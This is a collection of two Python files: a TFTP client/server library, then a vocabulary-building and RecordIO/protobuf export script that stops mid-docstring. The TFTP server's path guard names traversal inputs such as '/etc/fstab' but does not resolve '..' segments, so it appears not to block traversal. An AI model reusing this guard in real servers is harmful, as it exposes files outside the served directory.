from typing import List, NewType, Tuple, Union, Dict
logger = logging.getLogger('tftpd')
BLOCK_SIZE = 512
BUF_SIZE = 65536
TIMEOUT = 0.5
MAX_RETRIES = 10
class TFTPOpcodes:
"""Class containing all the opcodes used in TFTP."""
RRQ = b'\x00\x01'
WRQ = b'\x00\x02'
DATA = b'\x00\x03'
ACK = b'\x00\x04'
ERROR = b'\x00\x05'
OACK = b'\x00\x06'
class TFTPErrorCodes:
"""Class containing all the error codes and their messages used in TFTP."""
UNKNOWN = 0
FILE_NOT_FOUND = 1
ACCESS_VIOLATION = 2
DISK_FULL = 3
ILLEGAL_OPERATION = 4
UNKNOWN_TRANSFER_ID = 5
FILE_EXISTS = 6
NO_SUCH_USER = 7
INVALID_OPTIONS = 8
__MESSAGES = {
UNKNOWN: '',
FILE_NOT_FOUND: 'File not found',
ACCESS_VIOLATION: 'Access violation',
DISK_FULL: 'Disk full or allocation exceeded',
ILLEGAL_OPERATION: 'Illegal TFTP operation',
UNKNOWN_TRANSFER_ID: 'Unknown transfer ID',
FILE_EXISTS: 'File already exists',
NO_SUCH_USER: 'No such user',
INVALID_OPTIONS: 'Invalid options specified',
}
@classmethod
def get_message(cls, error_code: int) -> str:
"""Return an error message for given error code.
:param error_code: error code to get the message for
:return: error message
"""
return cls.__MESSAGES[error_code]
class TFTPOptions:
# RFC 2348
BLKSIZE = b'blksize'
# RFC 7440
WINDOWSIZE = b'windowsize'
Address = NewType('Address', tuple)
Packet = NewType('Packet', Tuple[bytes, Address])
class TFTPException(Exception):
"""Generic TFTP exception."""
pass
class TFTPError(TFTPException):
"""Exception meaning that a TFTP ERROR packet received."""
def __init__(self, error_id: int, message: str) -> None:
super(TFTPError, self).__init__(
'Error {}: {}'.format(error_id, message))
self.error_id = error_id
self.message = message
class TFTPTerminatedError(TFTPException):
"""Exception meaning that the TFTP connection was terminated for the
reason passed in `error_id` and `message` arguments."""
def __init__(self, error_id: int, error_message: str,
message: str) -> None:
super(TFTPTerminatedError, self).__init__(
'Terminated with error {}: {}; cause: {}'.format(
error_id, error_message, message))
self.error_id = error_id
        self.error_message = error_message
self.message = message
class TFTP:
"""
Base class for writing TFTP clients and servers. Handles all the basic
communication: generic method for sending and receiving packets, methods
for transmitting specific packets and whole files, as well as error
and timeout handling.
"""
def __init__(self, sock: socket.socket, addr: Address,
block_size: int = BLOCK_SIZE, window_size: int = 1) -> None:
"""
:param sock: socket to use to communicate
:param addr: address (host + port) of the connected host
"""
self._sock = sock
self._sock.settimeout(TIMEOUT)
self._addr = addr
self._block_size = block_size # RFC 2348
self._window_size = window_size # RFC 7440
# Whether to check the TID of incoming packets. If set to False, the
# next packet received will be used to set the new TID (and this will
# set _check_addr back to True)
self._check_addr = True
self.__last_packet: Packet = None
self.__packet_buffer: Packet = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._sock.close()
###########################################################################
# Error handling
###########################################################################
def _check_error(self, data: bytes, expected_opcodes: List[bytes]) -> None:
"""Check if the packet received has valid opcode and terminate the
connection if not or an ERROR packet was received.
:param data: the packet received
:param expected_opcodes: list of valid opcodes
:raise: TFTPTerminatedError if the opcode was not valid
:raise: TFTPError if an ERROR packet was received
"""
opcode = data[0:2]
if opcode == TFTPOpcodes.ERROR:
raise TFTPError(
int.from_bytes(data[2:4], byteorder='big'),
data[4:-1].decode('utf-8'))
elif opcode not in expected_opcodes:
self._terminate(TFTPErrorCodes.ILLEGAL_OPERATION,
'Invalid packet: {}'.format(data))
def _terminate(self, error_code: int, message: str,
error_message: str = None) -> None:
"""Send an ERROR packet, terminate the connection, and raise
a TFTPTerminatedError
:param error_code: error code to send
:param message: message to use for the exception
:param error_message: message to send with the ERROR packet. If None,
a default message for the given error code is used.
:raise: TFTPTerminatedError
"""
error_message = self._error_occurred(error_code, error_message)
self._sock.close()
raise TFTPTerminatedError(error_code, error_message, message)
def _error_occurred(self, error_code: int, error_message: str = None,
addr: Address = None) -> str:
"""Send an ERROR packet, auto-generating the message if necessary.
:param error_code: error code to send
:param error_message: message to send with the ERROR packet. If None,
a default message for the given error code is used.
:param addr: the address to send the packet to
:return: the error message that was sent
"""
if error_message is None:
error_message = TFTPErrorCodes.get_message(error_code)
self._send_err(error_code, error_message, addr)
return error_message
###########################################################################
# Receiving
###########################################################################
def _set_packet_buffer(self, data: bytes, addr: Address) -> None:
"""Set given packet as the "packet buffer". Packets in the buffer have
priority when trying to retrieve data using _recv(), giving a way to
use data from a different source (e.g. recvfrom() executed in another
function) when receiving packets using a unified function.
:param data: data to be set in the buffer
:param addr: address to be set in the buffer
"""
self.__packet_buffer = Packet((data, addr))
def _recv(self, handle_timeout: bool = True) -> Packet:
"""Receive a packet, taking into account packets in the packet buffer,
and retrying (by resending the last sent packet) if needed.
:return: packet received
:raise: TFTPException on timeout
"""
if self.__packet_buffer is not None:
rv = self.__packet_buffer
self.__packet_buffer = None
return rv
if not handle_timeout:
r = self._sock.recvfrom(BUF_SIZE)
return r
retries = 0
while retries <= MAX_RETRIES:
try:
r = self._sock.recvfrom(BUF_SIZE)
return r
except socket.timeout:
retries += 1
if retries <= MAX_RETRIES:
self.__resend_last_packet()
raise TFTPException('Timed out')
def _recv_packet_mul(
self, opcodes: List[bytes],
min_data_length: int, handle_timeout: bool = True) -> Tuple[
Address, bytes, bytes]:
"""Receive a packet and check if its opcode, length, and TID are valid.
:param opcodes: list of valid opcodes
:param min_data_length: minimum valid length of the data
:param handle_timeout: True to retry (by resending the last sent packet)
on timeout; False to let socket.timeout propagate
:return: a 3-tuple containing: source packet address, opcode received
and the data
"""
while True:
data, addr = self._recv(handle_timeout)
if not self._check_addr or addr == self._addr:
break
logger.warning('Invalid TID: %s (expected: %s)', addr, self._addr)
self._error_occurred(TFTPErrorCodes.UNKNOWN_TRANSFER_ID, addr=addr)
if not self._check_addr:
self._addr = addr
self._check_addr = True
self._check_error(data, opcodes)
if len(data) < min_data_length + 2:
self._terminate(TFTPErrorCodes.ILLEGAL_OPERATION,
'Packet too short: {}'.format(data))
return addr, data[0:2], data[2:]
def _recv_packet(self, opcode: bytes, min_data_length: int,
handle_timeout: bool = True) -> Tuple[Address, bytes]:
"""Receive a packet and check if its opcode, length, and TID are valid.
:param opcode: valid opcode
:param min_data_length: minimum valid length of the data
:return: a pair containing: source packet address and the data received
"""
addr, _, data = self._recv_packet_mul([opcode], min_data_length,
handle_timeout)
return addr, data
def _recv_data(
self, handle_timeout: bool = True) -> Tuple[Address, bytes, bytes]:
"""Receive a DATA packet and return the block ID and the data.
:return: 3-tuple containing the source address, block ID, and the data
"""
addr, data = self._recv_packet(TFTPOpcodes.DATA, 2, handle_timeout)
return addr, data[0:2], data[2:]
def _recv_ack(self, handle_timeout: bool = True) -> Tuple[Address, int]:
"""Receive an ACK packet and return the block ID.
:return: pair containing the source address and the block ID
"""
addr, data = self._recv_packet(TFTPOpcodes.ACK, 2, handle_timeout)
return addr, int.from_bytes(data, byteorder='big')
###########################################################################
# Sending
###########################################################################
def _send(self, data: bytes, addr: Address = None) -> None:
"""Send a packet and store it as the last packet sent.
:param data: data to be sent
:param addr: the destination address to send the packet to. If None,
self._addr is used.
"""
if addr is None:
addr = self._addr
self.__last_packet = Packet((data, addr))
self._sock.sendto(data, addr)
def __resend_last_packet(self) -> None:
"""Resend the last packet received (used for retries in _recv())."""
self._sock.sendto(*self.__last_packet)
def _send_ack(self, block_id: Union[bytes, int]) -> None:
"""Send an ACK packet.
:param block_id: block ID to send
"""
if isinstance(block_id, int):
block_id = block_id.to_bytes(2, byteorder='big')
self._send(TFTPOpcodes.ACK + block_id)
def _send_data(self, block_id: int, data: bytes) -> None:
"""Send a DATA packet.
:param block_id: block ID of the data
:param data: the data to send
"""
self._send(
TFTPOpcodes.DATA + block_id.to_bytes(2, byteorder='big') + data)
def _send_err(self, error_code: int, error_message: str = None,
addr: Address = None) -> None:
"""Send an ERROR packet.
:param error_code: error code to send
:param error_message: error message to send
:param addr: the destination address to send the packet to
"""
error_code_bytes = error_code.to_bytes(2, byteorder='big')
error_message_bytes = error_message.encode('utf-8')
self._send(TFTPOpcodes.ERROR + error_code_bytes + error_message_bytes +
b'\x00', addr)
###########################################################################
# Options (RFC 2347)
###########################################################################
def _process_options(self, options: List[bytes]) -> Dict[bytes, bytes]:
"""Process the options received in RRQ/WRQ packet.
This is an implementation of the RFC 2347 Options Extension.
:param options: list of the option strings (null-separated in
the original packet)
:return: dictionary of the processed and accepted options
"""
if options[-1] == b'':
options.pop()
if len(options) % 2 == 1:
raise ValueError
ret_val = {}
vals = zip(options[::2], options[1::2])
d = {k.lower(): (k, v) for k, v in vals}
# Block size (RFC 2348)
if TFTPOptions.BLKSIZE in d:
orig_key, orig_val = d[TFTPOptions.BLKSIZE]
blk_size = int(orig_val)
if blk_size < 8 or blk_size > 65464:
# Invalid according to RFC 2348
raise ValueError
self._block_size = blk_size
ret_val[orig_key] = orig_val
# Window size (RFC 7440)
if TFTPOptions.WINDOWSIZE in d:
orig_key, orig_val = d[TFTPOptions.WINDOWSIZE]
window_size = int(orig_val)
if window_size < 1 or window_size > 65535:
# Invalid according to RFC 7440
raise ValueError
self._window_size = window_size
ret_val[orig_key] = orig_val
return ret_val
def _format_options(self, options: Dict[bytes, bytes]):
"""Create single options bytes object out of the provided dictionary.
:param options: dictionary to convert to bytes object
:return: generated bytes object
"""
return b''.join(b'%s\x00%s\x00' % option for option in options.items())
###########################################################################
# Files
###########################################################################
def _recv_file(self) -> bytes:
"""Receive a file by listening for DATA packets and responding
with ACKs.
:return: received file
"""
last_id = 0
parts = []
retries = 0
while retries <= MAX_RETRIES:
start_last_id = last_id
for _ in range(self._window_size):
try:
addr, block_id, data = self._recv_data(
handle_timeout=False)
id_int = int.from_bytes(block_id, byteorder='big')
if id_int == last_id + 1:
parts.append(data)
last_id = id_int
if block_id == b'\xff\xff':
last_id = -1
if len(data) < self._block_size:
self._send_ack(last_id)
return b''.join(parts)
except socket.timeout:
if last_id == start_last_id:
retries += 1
break
else:
retries = 0
if retries <= MAX_RETRIES:
self._send_ack((65535 if last_id == -1 else last_id))
raise TFTPException('Timed out')
def _send_file(self, data: bytes) -> None:
"""Send a file by sending DATA packets and listening for ACKs.
:param data: data to be sent
"""
outer_block_id = 0
block_id = 0
while True:
retries = 0
while retries <= MAX_RETRIES:
try:
if not self.__send_blocks(data, outer_block_id, block_id):
return
_, ack_block_id = self._recv_ack(handle_timeout=False)
last_block_id = block_id + self._window_size
if ((last_block_id >= ack_block_id >= block_id) or
(ack_block_id <= last_block_id % 65536 and
ack_block_id < block_id)):
# If the received ACK replies to one of the blocks just sent,
# send the next batch of blocks; otherwise re-send
if ack_block_id < block_id:
outer_block_id += 1
block_id = ack_block_id
break
except socket.timeout:
retries += 1
else:
raise TFTPException('Timed out')
def __send_blocks(
self, data: bytes, outer_block_id: int, inner_block_id: int):
"""Send a single window of data.
:param data: data to be sent
:param outer_block_id: starting "outer" block ID (incremented by 1
each time inner block ID overflows)
:param inner_block_id: starting "inner" block ID in the range [0, 65535]
:return: False if there is no data to be sent; True otherwise
"""
blk_size = self._block_size
for i in range(self._window_size):
local_blkid = outer_block_id * 65536 + inner_block_id + i
if local_blkid * self._block_size > len(data):
if i == 0:
return False
else:
break
to_send = data[local_blkid * blk_size:
(local_blkid + 1) * blk_size]
self._send_data((local_blkid + 1) % 65536, to_send)
return True
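# Note added for clarity (not in the original source): __send_blocks numbers blocks
# as local_blkid = outer_block_id * 65536 + inner_block_id + i and puts
# (local_blkid + 1) % 65536 on the wire, so the 16-bit block ID wraps after 65535
# while outer_block_id counts the wraps. For example, with block_size=512 and
# window_size=4, the first window (outer=0, inner=0) sends wire block IDs 1..4,
# covering bytes 0..2047 of the payload.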
class TFTPClient(TFTP):
"""
Class that handles communication with a TFTP server and allows downloading
and uploading files.
"""
def __init__(self, host: str, port: int,
block_size: int = BLOCK_SIZE, window_size: int = 1) -> None:
"""
:param host: hostname/IP of the server to connect to
:param port: UDP port of the server to connect to
:param block_size: block size, as in RFC 2347
:param window_size: window size, as in RFC 7440
"""
super(TFTPClient, self).__init__(
socket.socket(socket.AF_INET, socket.SOCK_DGRAM),
Address((host, port)), block_size, window_size)
self.__options = self._format_options(self.__create_options_dict())
def __create_options_dict(self) -> Dict[bytes, bytes]:
"""Create options dictionary to feed into TFTP._format_options method.
The method omits the options that have default value.
:return: generated dictionary
"""
d = {}
if self._block_size != BLOCK_SIZE:
d[TFTPOptions.BLKSIZE] = str(self._block_size).encode('utf-8')
if self._window_size != 1:
d[TFTPOptions.WINDOWSIZE] = str(self._window_size).encode('utf-8')
return d
def __send_rq(self, opcode: bytes, file_name: str,
mode: str = 'octet') -> None:
"""Send an RRQ/WRQ packet.
:param opcode: opcode to send (see TFTPOpcodes.RRQ and TFTPOpcodes.WRQ)
:param file_name: name of the file requested
:param mode: requested file transfer mode ('octet' by default)
"""
self._send(b'%s%s\x00%s\x00%s' % (
opcode, bytes(file_name, 'utf-8'), bytes(mode, 'utf-8'),
self.__options))
def __send_rrq(self, file_name: str, mode: str = 'octet') -> None:
"""Send an RRQ packet.
:param file_name: name of the file requested
:param mode: requested file transfer mode ('octet' by default)
"""
self.__send_rq(TFTPOpcodes.RRQ, file_name, mode)
def __send_wrq(self, file_name: str, mode: str = 'octet') -> None:
"""Send a WRQ packet.
:param file_name: name of the uploaded file
:param mode: requested file transfer mode ('octet' by default)
"""
self.__send_rq(TFTPOpcodes.WRQ, file_name, mode)
def get_file(self, file_name: str) -> bytes:
"""Retrieve a file from the connected server.
:param file_name: name of the file to download
:return: file data returned by the server
"""
self.__send_rrq(file_name)
self._check_addr = False
self.__recv_first_rrq_packet()
return self._recv_file()
def __recv_first_rrq_packet(self):
"""Receive and respond (in case of OACK) to the first packet after
sending RRQ - either OACK or DATA.
"""
addr, opcode, data = self._recv_packet_mul(
[TFTPOpcodes.OACK, TFTPOpcodes.DATA], 0)
if opcode == TFTPOpcodes.DATA:
self._set_packet_buffer(opcode + data, addr)
else:
self.__process_oack(data)
self._send_ack(b'\x00\x00')
def put_file(self, file_name: str, data: bytes) -> None:
"""Upload a file to the connected server.
:param file_name: name of the uploaded file
:param data: data to be sent
"""
self.__send_wrq(file_name)
self._check_addr = False
self.__recv_first_wrq_packet()
self._send_file(data)
def __recv_first_wrq_packet(self):
"""Receive the first packet after sending WRQ - either OACK or ACK."""
addr, opcode, data = self._recv_packet_mul(
[TFTPOpcodes.OACK, TFTPOpcodes.ACK], 0)
if opcode == TFTPOpcodes.OACK:
self.__process_oack(data)
def __process_oack(self, data: bytes):
"""Process and apply the options from the OACK packet.
:param data: raw data got from the packet
"""
self._process_options(data.split(b'\0'))
class TFTPClientHandler(TFTP):
"""
Class that handles the communication with a single TFTP client on the
server side.
"""
def __init__(self, host: str, addr: Address, root_dir: Path,
allow_upload: bool, initial_buffer: bytes = None) -> None:
"""
:param host: host of the server to bind to
:param addr: address of the client to connect with
:param root_dir: root directory of the files to serve
:param allow_upload: whether or not to allow uploading files
:param initial_buffer: initial packet buffer; usually a `bytes` object
containing the first (RRQ/WRQ) packet, or None, if there is no
external server that catches the first packet.
"""
super().__init__(
socket.socket(socket.AF_INET, socket.SOCK_DGRAM), addr)
if initial_buffer is not None:
self._set_packet_buffer(initial_buffer, self._addr)
self._sock.bind((host, 0))
logger.info('Incoming connection from %s, binding at: %s',
self._addr, self._sock.getsockname())
self.__root_dir = root_dir
self.__allow_upload = allow_upload
def handle_client(self) -> None:
"""Handle the request sent by the connected client."""
opcode, file_name, mode = self.__recv_rq()
try:
path = self.__get_file_path(file_name)
if opcode == TFTPOpcodes.RRQ:
self.__handle_rrq(path)
else:
self.__handle_wrq(path)
except OSError as e:
self.__handle_file_error(e)
def __exit__(self, exc_type, exc_val, exc_tb):
logger.info('Closing connection to %s, bound at: %s',
self._addr, self._sock.getsockname())
super(TFTPClientHandler, self).__exit__(exc_type, exc_val, exc_tb)
def __recv_rq(self) -> Tuple[bytes, str, str]:
"""Receive an RRQ/WRQ packet and return received data.
:return: 3-tuple containing: received opcode, file name and file
transfer mode
"""
_, opcode, data = self._recv_packet_mul(
[TFTPOpcodes.RRQ, TFTPOpcodes.WRQ], 2)
try:
file_name_bytes, mode_bytes, *options = data.split(b'\0')
try:
new_options = self._process_options(options)
if len(new_options):
self.__send_oack(new_options)
if opcode == TFTPOpcodes.RRQ:
self._recv_ack()
except ValueError:
self._terminate(TFTPErrorCodes.INVALID_OPTIONS,
'Invalid options received')
file_name = file_name_bytes.decode('utf-8')
mode = mode_bytes.decode('utf-8')
except ValueError as e:
self._terminate(TFTPErrorCodes.ILLEGAL_OPERATION, str(e))
if mode != 'octet':
self._terminate(TFTPErrorCodes.ILLEGAL_OPERATION,
'Mode is not "octet": {}'.format(mode))
return opcode, file_name, mode
def __send_oack(self, new_options: Dict[bytes, bytes]):
"""Send an OACK packet.
:param new_options: dictionary of options to be included in
the OACK packet.
"""
msg = TFTPOpcodes.OACK + self._format_options(new_options)
self._send(msg)
def __get_file_path(self, file_name: str) -> Path:
"""Return file path inside server root directory, ignoring "evil"
paths, like "../../secret_file", "/etc/fstab", etc.
:param file_name: file name to get the path to
:return: absolute path inside the server root directory
"""
while PurePosixPath(file_name).is_absolute():
file_name = file_name[1:]
path = self.__root_dir.joinpath(file_name)
try:
path.relative_to(self.__root_dir)
except ValueError:
self._terminate(TFTPErrorCodes.ACCESS_VIOLATION,
'Invalid path: {}'.format(file_name))
return path
def __handle_rrq(self, path: Path) -> None:
"""Handle RRQ request: read and send the requested file.
:param path: path to the requested file
"""
self._send_file(path.read_bytes())
def __handle_wrq(self, path: Path) -> None:
"""Handle WRQ request: download and save the file from the client,
taking into account the `__allow_upload` setting.
:param path: path to save the file as
"""
if not self.__allow_upload:
self._terminate(TFTPErrorCodes.ACCESS_VIOLATION,
'Upload not allowed')
if path.exists():
self._terminate(TFTPErrorCodes.FILE_EXISTS,
'File exists: {}'.format(path))
self._send_ack(b'\x00\x00')
path.write_bytes(self._recv_file())
def __handle_file_error(self, e: OSError) -> None:
"""Handle given IO error, sending an appropriate ERROR packet and
terminating the transmission.
:param e: error raised when trying to open the file
"""
error_message = None
if e.errno == errno.ENOENT:
error_code = TFTPErrorCodes.FILE_NOT_FOUND
elif e.errno == errno.EPERM or e.errno == errno.EACCES:
error_code = TFTPErrorCodes.ACCESS_VIOLATION
elif e.errno == errno.EFBIG or e.errno == errno.ENOSPC:
error_code = TFTPErrorCodes.DISK_FULL
else:
error_code = TFTPErrorCodes.UNKNOWN
error_message = e.strerror
self._terminate(error_code, e.strerror, error_message)
class TFTPServer:
"""
Class that handles communication with multiple TFTP clients. Uses
TFTPClientHandler for the communication with each single client, running
one instance of this class in a separate thread for each client.
"""
def __init__(self, host: str, port: int, root_dir: Union[str, Path],
allow_upload: bool) -> None:
"""
:param host: host of the server to bind to
:param port: port to bind to
:param root_dir: the directory where the files should be served from
:param allow_upload: whether or not to allow uploading new files
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (host, port)
logger.info('Starting TFTP server, listening on %s', addr)
self.sock.bind(addr)
self.host = host
self.root_dir = Path(root_dir)
self.allow_upload = allow_upload
def __enter__(self):
return self
def serve(self) -> None:
"""Run the main server loop: wait for new connections and run
TFTPClientHandler for each.
"""
while True:
data, addr = self.sock.recvfrom(BUF_SIZE)
def handle_client() -> None:
TFTPClientHandler(
self.host, addr, self.root_dir, self.allow_upload,
data).handle_client()
Thread(target=handle_client).start()
def __exit__(self, exc_type, exc_val, exc_tb):
logger.info('Stopping TFTP server')
self.sock.close()
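# --- Illustrative usage sketch (added; not part of the original module). The
# --- addresses, port, directory and file name below are assumptions only.
if __name__ == '__main__':
    import sys
    logging.basicConfig(level=logging.INFO)
    if len(sys.argv) > 1 and sys.argv[1] == 'serve':
        # Serve ./tftp_root read-only on the standard TFTP port (needs privileges).
        with TFTPServer('0.0.0.0', 69, 'tftp_root', allow_upload=False) as server:
            server.serve()
    else:
        # Download a file from a local server, negotiating a 1 KiB block size.
        with TFTPClient('127.0.0.1', 69, block_size=1024) as client:
            print(client.get_file('example.txt').decode('utf-8', errors='replace'))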
|
create_vocab_proto.py
|
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
import argparse
import gzip
import io
import json
import logging
import multiprocessing
import os
import pickle
import struct
from collections import Counter
from contextlib import ExitStack
from itertools import chain, islice
from typing import Dict, Generator, Iterable, List, Mapping
import boto3
from record_pb2 import Record
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# Global constants
JSON_SUFFIX = ".json"
ARG_SEPARATOR = ":"
BOS_SYMBOL = "<s>"
EOS_SYMBOL = "</s>"
UNK_SYMBOL = "<unk>"
PAD_SYMBOL = "<pad>"
PAD_ID = 0
TOKEN_SEPARATOR = " "
VOCAB_SYMBOLS = [PAD_SYMBOL, UNK_SYMBOL, BOS_SYMBOL, EOS_SYMBOL]
VOCAB_ENCODING = "utf-8"
# RecordIO and Protobuf related utilities
def write_recordio(f, data):
kmagic = 0xCED7230A
length = len(data)
f.write(struct.pack("I", kmagic))
f.write(struct.pack("I", length))
upper_align = ((length + 3) >> 2) << 2
padding = bytes([0x00 for _ in range(upper_align - length)])
f.write(data)
f.write(padding)
def list_to_record_bytes(source: List[int] = None, target: List[int] = None):
record = Record()
record.features["source"].int32_tensor.values.extend(source)
record.features["target"].int32_tensor.values.extend(target)
return record.SerializeToString()
def read_next(f):
kmagic = 0xCED7230A
raw_bytes = f.read(4)
if not raw_bytes:
return
m = struct.unpack("I", raw_bytes)[0]
if m != kmagic:
raise ValueError("Incorrect encoding")
length = struct.unpack("I", f.read(4))[0]
upper_align = ((length + 3) >> 2) << 2
data = f.read(upper_align)
return data[:length]
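# Minimal round-trip sketch (added for illustration; not part of the original
# script). It shows how write_recordio/read_next frame a serialized Record:
# a magic number, a length field, then the payload padded to a 4-byte boundary.
def _demo_recordio_roundtrip():
    buf = io.BytesIO()
    payload = list_to_record_bytes([1, 2, 3], [4, 5])
    write_recordio(buf, payload)
    buf.seek(0)
    assert read_next(buf) == payload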
def to_proto(f, sources, targets):
for source, target in zip(sources, targets):
record = list_to_record_bytes(source, target)
write_recordio(f, record)
def write_to_s3(fobj, bucket, key):
return boto3.Session().resource("s3").Bucket(bucket).Object(key).upload_fileobj(fobj)
def upload_to_s3(bucket, key, sources, targets):
f = io.BytesIO()
to_proto(f, sources, targets)
f.seek(0)
url = "s3n://{}/{}".format(bucket, key)
print("Writing to {}".format(url))
write_to_s3(f, bucket, key)
print("Done writing to {}".format(url))
def smart_open(filename: str, mode: str = "rt", ftype: str = "auto", errors: str = "replace"):
"""
Returns a file descriptor for filename with UTF-8 encoding.
If mode is "rt", file is opened read-only.
If ftype is "auto", uses gzip iff filename endswith .gz.
If ftype is {"gzip","gz"}, uses gzip.
Note: encoding error handling defaults to "replace"
:param filename: The filename to open.
:param mode: Reader mode.
:param ftype: File type. If 'auto' checks filename suffix for gz to try gzip.open
:param errors: Encoding error handling during reading. Defaults to 'replace'
:return: File descriptor
"""
if ftype == "gzip" or ftype == "gz" or (ftype == "auto" and filename.endswith(".gz")):
return gzip.open(filename, mode=mode, encoding="utf-8", errors=errors)
else:
return open(filename, mode=mode, encoding="utf-8", errors=errors)
def get_tokens(line: str) -> Generator[str, None, None]:
"""
Yields tokens from input string.
:param line: Input string.
:return: Iterator over tokens.
"""
for token in line.rstrip().split():
if len(token) > 0:
yield token
def add_optional_args(model_params):
model_params.add_argument(
"-vs", "--val-source", required=False, type=str, help="Validation source file."
)
model_params.add_argument(
"-vt", "--val-target", required=False, type=str, help="Validation target file."
)
model_params.add_argument(
"-to",
"--train-output",
required=False,
type=str,
default="train.rec",
help="Output filename (protobuf encoded .rec file) to write the processed train file. "
"Default: %(default)s",
)
model_params.add_argument(
"-vo",
"--val-output",
required=False,
type=str,
default="val.rec",
help="Output filename (protobuf encoded .rec file) to write the processed validation "
"file. Default: %(default)s",
)
model_params.add_argument(
"-single-vocab",
action="store_true",
default=False,
help="Include this flag to build a single vocab for both source and target.",
)
model_params.add_argument(
"--vocab-source-json",
required=False,
type=str,
default=None,
help="Path to source vocab json if it already exists",
)
model_params.add_argument(
"--vocab-target-json",
required=False,
type=str,
default=None,
help="Path to vocab target json if it already exists",
)
model_params.add_argument(
"--num-words-source",
required=False,
type=int,
default=50000,
help="Maximum vocabulary size for source. Default: %(default)s",
)
model_params.add_argument(
"--num-words-target",
required=False,
type=int,
default=50000,
help="Maximum vocabulary size for target. Default: %(default)s",
)
model_params.add_argument(
"--word-min-count-source",
required=False,
type=int,
default=1,
help="Minimum frequency of words to be included in source vocabulary. "
"Default: %(default)s",
)
model_params.add_argument(
"--word-min-count-target",
required=False,
type=int,
default=1,
help="Minimum frequency of words to be included in target vocabulary. "
"Default: %(default)s",
)
def add_vocab_args(required, optional):
required.add_argument(
"-ts", "--train-source", required=True, type=str, help="Training source file."
)
required.add_argument(
"-tt", "--train-target", required=True, type=str, help="Training target file."
)
add_optional_args(optional)
def build_from_paths(
input_source: str,
input_target: str,
single_vocab: bool = False,
num_words_source: int = 50000,
num_words_target: int = 50000,
min_count_source: int = 1,
min_count_target: int = 1,
) -> (Dict[str, int], Dict[str, int]):
"""
Creates vocabulary from paths to a file in sentence-per-line format. A sentence is just a whitespace delimited
list of tokens. Note that special symbols like the beginning of sentence (BOS) symbol will be added to the
vocabulary.
:param input_target: Input original target file path.
:param single_vocab: to build single vocabulary for source and target or not.
:param num_words_source: number of max vocabulary on source side.
:param num_words_target: number of max vocabulary on target side.
:param min_count_source: Minimum frequency to include a word in source vocabulary.
:param min_count_target: Minimum frequency to include a word in target vocabulary.
:param input_source: Input original source file path.
:return: Word-to-id mapping.
"""
with ExitStack() as stack:
logger.info("Building vocabulary from dataset: %s and %s", input_source, input_target)
files = (stack.enter_context(smart_open(path)) for path in [input_source, input_target])
return build_vocab(
*files,
single_vocab=single_vocab,
num_words_source=num_words_source,
num_words_target=num_words_target,
min_count_source=min_count_source,
min_count_target=min_count_target
)
def read_worker(q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
int_source, int_target = deq
record = list_to_record_bytes(int_source, int_target)
q_out.put(record)
def write_worker(q_out, output_file):
with open(output_file, "wb") as f:
while True:
deq = q_out.get()
if deq is None:
break
write_recordio(f, deq)
def write_to_file(
input_source: str,
input_target: str,
output_file: str,
vocab_source: Dict[str, int],
vocab_target: Dict[str, int],
file_type: str = "train",
):
"""
Converts the input strings to integers. Processes all the input files and writes them into a single file,
each line of which is a list of integers.
:param input_source: input original source file path (parallel corpus).
:param input_target: input original target file path (parallel corpus).
:param output_file: Path of output file to which the processed input file will be written
:param vocab_source: String to Integer mapping of source vocabulary
:param vocab_target: String to Integer mapping of target vocabulary
"""
num_read_workers = max(multiprocessing.cpu_count() - 1, 1)
logger.info(
"Spawning %s encoding worker(s) for encoding %s datasets!", str(num_read_workers), file_type
)
q_in = [multiprocessing.Queue() for i in range(num_read_workers)]
q_out = multiprocessing.Queue()
read_process = [
multiprocessing.Process(target=read_worker, args=(q_in[i], q_out))
for i in range(num_read_workers)
]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, output_file))
write_process.start()
lines_ignored = 0
lines_processed = 0
with ExitStack() as stack:
files = (stack.enter_context(smart_open(path)) for path in [input_source, input_target])
for line_source, line_target in zip(*files):
if line_source.strip() == "" or line_target.strip() == "":
lines_ignored += 1
continue
int_source = [
vocab_source.get(token, vocab_source[UNK_SYMBOL])
for token in get_tokens(line_source)
]
int_target = [
vocab_target.get(token, vocab_target[UNK_SYMBOL])
for token in get_tokens(line_target)
]
item = (int_source, int_target)
q_in[lines_processed % len(q_in)].put(item)
lines_processed += 1
logger.info(
"""Processed %s lines for encoding to protobuf. %s lines were ignored as they didn't have
any content in either the source or the target file!""",
lines_processed,
lines_ignored,
)
logger.info("Completed writing the encoding queue!")
for q in q_in:
q.put(None)
for p in read_process:
p.join()
logger.info('Encoding finished! Writing records to "%s"', output_file)
q_out.put(None)
write_process.join()
logger.info('Processed input and saved to "%s"', output_file)
def prune_vocab(raw_vocab, num_words, min_count):
# For words with the same count, they will be ordered reverse alphabetically.
# Not an issue since we only care for consistency
pruned_vocab = sorted(((c, w) for w, c in raw_vocab.items() if c >= min_count), reverse=True)
# logger.info("Pruned vocabulary: %d types (min frequency %d)", len(pruned_vocab), min_count)
vocab = islice((w for c, w in pruned_vocab), num_words)
word_to_id = {word: idx for idx, word in enumerate(chain(VOCAB_SYMBOLS, vocab))}
logger.info(
"Final vocabulary: %d types (min frequency %d, top %d types)",
len(word_to_id),
min_count,
num_words,
)
# Important: pad symbol becomes index 0
assert word_to_id[PAD_SYMBOL] == PAD_ID
return word_to_id
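# Worked example (comment added for clarity; not in the original file): given
# raw_vocab = Counter({'the': 5, 'cat': 2, 'a': 2}) with num_words=50000 and
# min_count=1, prune_vocab keeps all three words, orders them by (count, word)
# descending -- 'the', 'cat', 'a' -- and prepends the special symbols, yielding
# {'<pad>': 0, '<unk>': 1, '<s>': 2, '</s>': 3, 'the': 4, 'cat': 5, 'a': 6}.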
def build_vocab(
data_source: Iterable[str],
data_target: Iterable[str],
single_vocab: bool = False,
num_words_source: int = 50000,
num_words_target: int = 50000,
min_count_source: int = 1,
min_count_target: int = 1,
) -> (Dict[str, int], Dict[str, int]):
"""
